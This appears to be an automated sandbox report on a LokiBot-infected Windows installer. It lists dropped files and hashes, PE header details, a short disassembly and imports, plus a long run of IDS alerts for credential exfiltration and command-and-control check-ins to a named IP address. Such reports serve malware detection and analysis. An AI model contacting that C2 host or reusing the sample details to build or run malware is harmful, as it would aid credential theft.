                Preview:.....&|.D.14.XDV...X.O..6..X.O..6.DV..6.....DV...F..F.n6.!.....j6.j&..F..F.n6.!.....j6.j&..F..F.n6.!....j6.j&..F..F.n6.!....j6.j&.D~..?.S.Y\...6..j6.j&.|6.D....j6.j..|6.|..n...S.Z..|6..&.n.j6.X.jV.D..S......D.....V..F.Z.F.#.F.2Y.F.2Z.F.P.F.Wv.U.H)|..H)j=..D..F..F.2#|6...j6..V.............D...|V.WP|6.PW,|.^...&|."".X.O..6.|6.|..6.T.|6.|.|..|..j&.|...j6.|6.|.1|..j.|6.|&.|.^...I..p.y....G.....IO..p.O....-.....I.-lp.5....3.....&|.D...X.O..6.6.....n6.j6.D~..U.|6...|6.1j6.|6.)j6.......v.U/|6.S.Z\..j...j5.n6.S.Z...j...j5.S.S.Y\..n...!IO..p....!....j6...n6.!.F..3...j6.D~..U.DV....6.....|6.|.^...&|.D.1.X.O..6.6.....n6.j6.D~..U.|6...|6.1j6.|6.)j6...$...v..Es...|6.S.Z\..j..j5.|6..S.Z...j..j5.|6.S.Z..j..j5.|6...S.#\..j..j=.n6.S.Z...j..j5.S.S.Y\..n...!I..p.....!....j6.D~..U.|6.|..j....F..F..F..F..F..8...j6.D~..U.DV....6.....|6.|.^...&|.D..6.....n6.j6.D~..U.|6...|6.1j6.|6.)j6...S...v.U/|6.S.Z\..j..j5..|6..S.Z...j..j5..S.S.Y\..n...!I.-lp.....!.....j6....F

                C:\Users\user\AppData\Local\Temp\zhi4pk9imnkv3lr

                Download File
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):218255
                Entropy (8bit):7.988008060500998
                Encrypted:false
                SSDEEP:6144:N0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUe:ur1XaeS0xw5XNVGx0xjV
                MD5:4ABFD766D3D71773430A02F9CDDC33B2
                SHA1:D623A96E0F04A04CB73F632D89263513AB9EA5E4
                SHA-256:5F335EA5F3D9C2FC3E21CAA50C960EEE648BA5988D99490DA32F9A6A4009EEE6
                SHA-512:BD6A540D1884FFCAB7BFE760480474C2BB329F803A413BD143126A66F8184E5566830E4F09BA07F8E24C4476FD5556487519FDC8D73499EE239A1B94E82A0366
                Malicious:false
                Reputation:low
                Preview:.1W{.@K......')V..P#1_x#K.....Q..|.6?..>.`>..x..<....j.[P........d.y."7..<.q..G.................t.o.......:.H..#SuqCw3...n/. ....Q.7{..,6.....~]X<..2._L.\.N.t...O....q~.^[)..K......o.a..]...._FS.4.........2.N...x...00.....1Yzp..J@.v...... +...~:.{V@V~......P'....P#1.j.K........|{6?..>..>..xB.<......P..<.T .`...5.6X..<N?.6).P..1.....h.T..].?..D..8.....&.sk.8SuqCw3..R..K8...,....U.H.)..99z...Z....Q...2..h..6.h[..y..D.....\...9.@.X\.1...*.J...T...2n........n`.2y...fRL..xzp.m.{..]...Xn.+...~:.{s@K..........X.9K#1.l#K.B....Q...P6?..>.`>..x.........#P..s. .\...8.6.7..N?/6).P..1............?..D..8....&7IW.8SuqCw3..R..K8...,....U.H.)..99z...Z....Q...2..h..6.h[..y..D.....\...9.@.X\.1.........T...2n........n`.2y...f...1Yzp...@.....K..+...~:.{s@K........'.V..P#1.x#K.....Q..|.6?..>.`>..x..<....j..P..<.. ....5.6....N?/6).P..1.....h.T....?..D..8...~.&7sk.8SuqCw3..R..K8...,....U.H.)..99z...Z....Q...2..h..6.h[..y..D.....\...9.@.X\.1.........T...2n........n`.2y...f

                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

                Download File
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1

                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                Download File
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):49
                Entropy (8bit):1.2701062923235522
                Encrypted:false
                SSDEEP:3:/l1PL3n:fPL3
                MD5:CD8FA61AD2906643348EEF98A988B873
                SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                Malicious:false
                Preview:........................................user.

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.9269620673373185
                TrID:
                • Win32 Executable (generic) a (10002005/4) 92.16%
                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:kVijllv0Yl.exe
                File size:247353
                MD5:6997de404fb7e798aecc2c8a14fd2f12
                SHA1:121a437542ba544f975847429dda439719800bb9
                SHA256:f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
                SHA512:bb3fe544bdf9770bbb9864d9e14daa68d8357a91d06f33f90b7165467c608b9a2fd46009b37f4d914112d18acceaaa1cd3e2df92db65ec0f1bc20b41a020faa5
                SSDEEP:3072:oNyah0mJo4m2pkC3Z4FRH8aVAW3dxaj0ubNDHgJiLwYePSCfPrpAfZSQme11lz:owkZN3KRHXA0ajnHXYPbfjKxce1bz
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                File Icon

                Icon Hash:b2a88c96b2ca6a72

                Static PE Info

                General

                Entrypoint:0x403225
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:099c0646ea7282d232219f8807883be0

                Entrypoint Preview

                Instruction
                sub esp, 00000180h
                push ebx
                push ebp
                push esi
                xor ebx, ebx
                push edi
                mov dword ptr [esp+18h], ebx
                mov dword ptr [esp+10h], 00409128h
                xor esi, esi
                mov byte ptr [esp+14h], 00000020h
                call dword ptr [00407030h]
                push 00008001h
                call dword ptr [004070B4h]
                push ebx
                call dword ptr [0040727Ch]
                push 00000008h
                mov dword ptr [00423F58h], eax
                call 00007F4D3C573CD0h
                mov dword ptr [00423EA4h], eax
                push ebx
                lea eax, dword ptr [esp+34h]
                push 00000160h
                push eax
                push ebx
                push 0041F450h
                call dword ptr [00407158h]
                push 004091B0h
                push 004236A0h
                call 00007F4D3C573987h
                call dword ptr [004070B0h]
                mov edi, 00429000h
                push eax
                push edi
                call 00007F4D3C573975h
                push ebx
                call dword ptr [0040710Ch]
                cmp byte ptr [00429000h], 00000022h
                mov dword ptr [00423EA0h], eax
                mov eax, edi
                jne 00007F4D3C57119Ch
                mov byte ptr [esp+14h], 00000022h
                mov eax, 00429001h
                push dword ptr [esp+14h]
                push eax
                call 00007F4D3C573468h
                push eax
                call dword ptr [0040721Ch]
                mov dword ptr [esp+1Ch], eax
                jmp 00007F4D3C5711F5h
                cmp cl, 00000020h
                jne 00007F4D3C571198h
                inc eax
                cmp byte ptr [eax], 00000020h
                je 00007F4D3C57118Ch
                cmp byte ptr [eax], 00000022h
                mov byte ptr [eax+eax+00h], 00000000h

                Rich Headers

                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x2c1900x2e8dataEnglishUnited States
                RT_DIALOG0x2c4780x100dataEnglishUnited States
                RT_DIALOG0x2c5780x11cdataEnglishUnited States
                RT_DIALOG0x2c6980x60dataEnglishUnited States
                RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                Imports

                DLLImport
                KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                01/28/22-23:37:07.260369TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976980192.168.2.6185.185.69.76
                01/28/22-23:37:07.260369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.6185.185.69.76
                01/28/22-23:37:07.260369TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.6185.185.69.76
                01/28/22-23:37:07.260369TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976980192.168.2.6185.185.69.76
                01/28/22-23:37:10.277966TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14977080192.168.2.6185.185.69.76
                01/28/22-23:37:10.277966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.6185.185.69.76
                01/28/22-23:37:10.277966TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.6185.185.69.76
                01/28/22-23:37:10.277966TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24977080192.168.2.6185.185.69.76
                01/28/22-23:37:14.709347TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.6185.185.69.76
                01/28/22-23:37:14.709347TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.6185.185.69.76
                01/28/22-23:37:14.709347TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.6185.185.69.76
                01/28/22-23:37:14.709347TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.6185.185.69.76
                01/28/22-23:37:16.117797TCP2025483ET TROJAN LokiBot Fake 404 Response8049771185.185.69.76192.168.2.6
                01/28/22-23:37:17.458669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.6185.185.69.76
                01/28/22-23:37:17.458669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.6185.185.69.76
                01/28/22-23:37:17.458669TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.6185.185.69.76
                01/28/22-23:37:17.458669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.6185.185.69.76
                01/28/22-23:37:18.890584TCP2025483ET TROJAN LokiBot Fake 404 Response8049773185.185.69.76192.168.2.6
                01/28/22-23:37:20.261992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.6185.185.69.76
                01/28/22-23:37:20.261992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.6185.185.69.76
                01/28/22-23:37:20.261992TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.6185.185.69.76
                01/28/22-23:37:20.261992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.6185.185.69.76
                01/28/22-23:37:21.668707TCP2025483ET TROJAN LokiBot Fake 404 Response8049774185.185.69.76192.168.2.6
                01/28/22-23:37:22.809911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.6185.185.69.76
                01/28/22-23:37:22.809911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.6185.185.69.76
                01/28/22-23:37:22.809911TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.6185.185.69.76
                01/28/22-23:37:22.809911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.6185.185.69.76
                01/28/22-23:37:24.212196TCP2025483ET TROJAN LokiBot Fake 404 Response8049775185.185.69.76192.168.2.6
                01/28/22-23:37:25.398463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.6185.185.69.76
                01/28/22-23:37:25.398463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.6185.185.69.76
                01/28/22-23:37:25.398463TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.6185.185.69.76
                01/28/22-23:37:25.398463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.6185.185.69.76
                01/28/22-23:37:26.758080TCP2025483ET TROJAN LokiBot Fake 404 Response8049776185.185.69.76192.168.2.6
                01/28/22-23:37:29.263306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.6185.185.69.76
                01/28/22-23:37:29.263306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.6185.185.69.76
                01/28/22-23:37:29.263306TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.6185.185.69.76
                01/28/22-23:37:29.263306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.6185.185.69.76
                01/28/22-23:37:30.738582TCP2025483ET TROJAN LokiBot Fake 404 Response8049779185.185.69.76192.168.2.6
                01/28/22-23:37:33.962521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.6185.185.69.76
                01/28/22-23:37:33.962521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.6185.185.69.76
                01/28/22-23:37:33.962521TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.6185.185.69.76
                01/28/22-23:37:33.962521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.6185.185.69.76
                01/28/22-23:37:35.373624TCP2025483ET TROJAN LokiBot Fake 404 Response8049780185.185.69.76192.168.2.6
                01/28/22-23:37:36.594728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.6185.185.69.76
                01/28/22-23:37:36.594728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.6185.185.69.76
                01/28/22-23:37:36.594728TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.6185.185.69.76
                01/28/22-23:37:36.594728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.6185.185.69.76
                01/28/22-23:37:37.913035TCP2025483ET TROJAN LokiBot Fake 404 Response8049782185.185.69.76192.168.2.6
                01/28/22-23:37:39.408767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.6185.185.69.76
                01/28/22-23:37:39.408767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.6185.185.69.76
                01/28/22-23:37:39.408767TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.6185.185.69.76
                01/28/22-23:37:39.408767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.6185.185.69.76
                01/28/22-23:37:40.689153TCP2025483ET TROJAN LokiBot Fake 404 Response8049783185.185.69.76192.168.2.6
                01/28/22-23:37:41.973820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.6185.185.69.76
                01/28/22-23:37:41.973820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.6185.185.69.76
                01/28/22-23:37:41.973820TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.6185.185.69.76
                01/28/22-23:37:41.973820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.6185.185.69.76
                01/28/22-23:37:43.403239TCP2025483ET TROJAN LokiBot Fake 404 Response8049784185.185.69.76192.168.2.6
                01/28/22-23:37:44.786353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.6185.185.69.76
                01/28/22-23:37:44.786353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.6185.185.69.76
                01/28/22-23:37:44.786353TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.6185.185.69.76
                01/28/22-23:37:44.786353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.6185.185.69.76
                01/28/22-23:37:46.235905TCP2025483ET TROJAN LokiBot Fake 404 Response8049787185.185.69.76192.168.2.6
                01/28/22-23:37:51.111628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.6185.185.69.76
                01/28/22-23:37:51.111628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.6185.185.69.76
                01/28/22-23:37:51.111628TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.6185.185.69.76
                01/28/22-23:37:51.111628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.6185.185.69.76
                01/28/22-23:37:52.495630TCP2025483ET TROJAN LokiBot Fake 404 Response8049793185.185.69.76192.168.2.6
                01/28/22-23:37:55.089534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.6185.185.69.76
                01/28/22-23:37:55.089534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.6185.185.69.76
                01/28/22-23:37:55.089534TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.6185.185.69.76
                01/28/22-23:37:55.089534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.6185.185.69.76
                01/28/22-23:37:56.498845TCP2025483ET TROJAN LokiBot Fake 404 Response8049795185.185.69.76192.168.2.6
                01/28/22-23:37:59.460407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.6185.185.69.76
                01/28/22-23:37:59.460407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.6185.185.69.76
                01/28/22-23:37:59.460407TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.6185.185.69.76
                01/28/22-23:37:59.460407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.6185.185.69.76
                01/28/22-23:38:00.863838TCP2025483ET TROJAN LokiBot Fake 404 Response8049797185.185.69.76192.168.2.6
                01/28/22-23:38:02.169112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.6185.185.69.76
                01/28/22-23:38:02.169112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.6185.185.69.76
                01/28/22-23:38:02.169112TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.6185.185.69.76
                01/28/22-23:38:02.169112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.6185.185.69.76
                01/28/22-23:38:03.551551TCP2025483ET TROJAN LokiBot Fake 404 Response8049802185.185.69.76192.168.2.6
                01/28/22-23:38:06.424436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.6185.185.69.76
                01/28/22-23:38:06.424436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.6185.185.69.76
                01/28/22-23:38:06.424436TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.6185.185.69.76
                01/28/22-23:38:06.424436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.6185.185.69.76
                01/28/22-23:38:07.849755TCP2025483ET TROJAN LokiBot Fake 404 Response8049818185.185.69.76192.168.2.6
                01/28/22-23:38:10.077239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.6185.185.69.76
                01/28/22-23:38:10.077239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.6185.185.69.76
                01/28/22-23:38:10.077239TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.6185.185.69.76
                01/28/22-23:38:10.077239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.6185.185.69.76
                01/28/22-23:38:11.381909TCP2025483ET TROJAN LokiBot Fake 404 Response8049830185.185.69.76192.168.2.6
                01/28/22-23:38:12.712442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.6185.185.69.76
                01/28/22-23:38:12.712442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.6185.185.69.76
                01/28/22-23:38:12.712442TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.6185.185.69.76
                01/28/22-23:38:12.712442TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.6185.185.69.76
                01/28/22-23:38:14.111048TCP2025483ET TROJAN LokiBot Fake 404 Response8049840185.185.69.76192.168.2.6
                01/28/22-23:38:17.281043TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.6185.185.69.76
                01/28/22-23:38:17.281043TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.6185.185.69.76
                01/28/22-23:38:17.281043TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.6185.185.69.76
                01/28/22-23:38:17.281043TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.6185.185.69.76
                01/28/22-23:38:18.654023TCP2025483ET TROJAN LokiBot Fake 404 Response8049841185.185.69.76192.168.2.6
                01/28/22-23:38:20.171529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.6185.185.69.76
                01/28/22-23:38:20.171529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.6185.185.69.76
                01/28/22-23:38:20.171529TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.6185.185.69.76
                01/28/22-23:38:20.171529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.6185.185.69.76
                01/28/22-23:38:21.628648TCP2025483ET TROJAN LokiBot Fake 404 Response8049842185.185.69.76192.168.2.6
                01/28/22-23:38:23.240806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.6185.185.69.76
                01/28/22-23:38:23.240806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.6185.185.69.76
                01/28/22-23:38:23.240806TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.6185.185.69.76
                01/28/22-23:38:23.240806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.6185.185.69.76
                01/28/22-23:38:24.676434TCP2025483ET TROJAN LokiBot Fake 404 Response8049845185.185.69.76192.168.2.6
                01/28/22-23:38:27.482883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.6185.185.69.76
                01/28/22-23:38:27.482883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.6185.185.69.76
                01/28/22-23:38:27.482883TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.6185.185.69.76
                01/28/22-23:38:27.482883TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.6185.185.69.76
                01/28/22-23:38:28.925374TCP2025483ET TROJAN LokiBot Fake 404 Response8049850185.185.69.76192.168.2.6
                01/28/22-23:38:31.054520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.6185.185.69.76
                01/28/22-23:38:31.054520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.6185.185.69.76
                01/28/22-23:38:31.054520TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.6185.185.69.76
                01/28/22-23:38:31.054520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.6185.185.69.76
                01/28/22-23:38:32.352724TCP2025483ET TROJAN LokiBot Fake 404 Response8049851185.185.69.76192.168.2.6
                01/28/22-23:38:33.510655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.6185.185.69.76
                01/28/22-23:38:33.510655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.6185.185.69.76
                01/28/22-23:38:33.510655TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.6185.185.69.76
